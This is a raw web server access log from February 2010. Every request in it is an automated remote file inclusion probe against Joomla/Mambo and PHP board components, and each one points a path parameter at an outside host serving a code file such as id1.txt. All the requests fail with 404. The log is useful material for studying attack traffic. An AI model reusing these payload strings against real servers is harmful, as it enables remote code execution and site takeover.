74.205.120.218 - - [15/Feb/2010:01:18:17 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_pollxt/config_pollxt.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:18:20 -0800] "GET /logs//administrator/components/com_pollxt/config_pollxt.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:18:20 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_pollxt/config_pollxt.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:18:21 -0800] "GET /administrator/components/com_pollxt/config_pollxt.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:18:41 -0800] "GET /logs/access_091228.log/////components/com_extcalendar/config_extcalendar.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:18:52 -0800] "GET /logs/access_100125.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:01:19:13 -0800] "GET /logs/access_091102.log%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:19:17 -0800] "GET /logs/access_091228.log/////components/com_extcalendar/config_extcalendar.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:19:34 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:19:34 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:19:34 -0800] "GET /logs/access_091221.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:19:41 -0800] "GET /logs/access_100111.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:19:50 -0800] "GET /logs/access_091109.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:19:52 -0800] "GET /logs/access_090921.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:19:52 -0800] "GET /logs/access_091012.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:19:53 -0800] "GET /logs/access.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:19:53 -0800] "GET /logs/access_100118.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:19:57 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:20:07 -0800] "GET /logs/access_090921.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:20:33 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:20:33 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:20:33 -0800] "GET /logs/access_091221.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:20:40 -0800] "GET /logs/access_100111.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:20:57 -0800] "GET /administrator/components/com_pollxt/config_pollxt.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:20:57 -0800] "GET /logs/access_091228.log//administrator/components/com_pollxt/config_pollxt.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:20:57 -0800] "GET /logs//administrator/components/com_pollxt/config_pollxt.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:06 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:06 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:06 -0800] "GET /logs/access_091221.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:11 -0800] "GET /logs/access_091109.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:13 -0800] "GET /logs/access_090921.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:14 -0800] "GET /logs/access.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:14 -0800] "GET /logs/access_091012.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:15 -0800] "GET /logs/access_100111.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:15 -0800] "GET /logs/access_100118.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:21:19 -0800] "GET /administrator/components/com_pollxt/config_pollxt.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:21:19 -0800] "GET /logs/access_091228.log//administrator/components/com_pollxt/config_pollxt.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:01:21:19 -0800] "GET /logs//administrator/components/com_pollxt/config_pollxt.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:20 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:26 -0800] "GET /logs/access_091109.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:29 -0800] "GET /logs/access_090921.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:30 -0800] "GET /logs/access.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:30 -0800] "GET /logs/access_090921.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:30 -0800] "GET /logs/access_091012.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:32 -0800] "GET /logs/access_100118.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:38 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:01:21:47 -0800] "GET /logs/access_090921.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:23:28 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:23:31 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:23:32 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:23:39 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:23:39 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:23:42 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.231.1.142 - - [15/Feb/2010:01:24:01 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.142 - - [15/Feb/2010:01:24:01 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.142 - - [15/Feb/2010:01:24:01 -0800] "GET /logs/access_100118.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:24:07 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:24:07 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:24:07 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:24:14 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:24:14 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:24:20 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:24:33 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:24:33 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:24:33 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:24:40 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:24:40 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:24:40 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:25:05 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:25:14 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:25:31 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:25:31 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.142 - - [15/Feb/2010:01:25:35 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.142 - - [15/Feb/2010:01:25:36 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.142 - - [15/Feb/2010:01:25:36 -0800] "GET /logs/access_100118.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:25:39 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:25:39 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:25:41 -0800] "GET /logs/access_091102.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.142 - - [15/Feb/2010:01:25:49 -0800] "GET /logs/access_100111.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.142 - - [15/Feb/2010:01:26:04 -0800] "GET /logs/access_100111.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:26:43 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:26:43 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:26:47 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [15/Feb/2010:01:27:49 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:27:51 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:27:53 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [15/Feb/2010:01:28:32 -0800] "GET /logs//write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [15/Feb/2010:01:28:32 -0800] "GET /logs/access_100201.log%20%20//write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [15/Feb/2010:01:28:32 -0800] "GET /write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [15/Feb/2010:01:28:38 -0800] "GET /write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [15/Feb/2010:01:28:38 -0800] "GET /logs//write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.172.27 - - [15/Feb/2010:01:28:39 -0800] "GET /logs/access_100201.log%20%20//write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:29:01 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:29:01 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:29:04 -0800] "GET /logs/access_090720.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:01:29:19 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:01:29:19 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
85.17.139.19 - - [15/Feb/2010:01:29:29 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:30 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:30 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:30 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:30 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:30 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:31 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:01:29:33 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
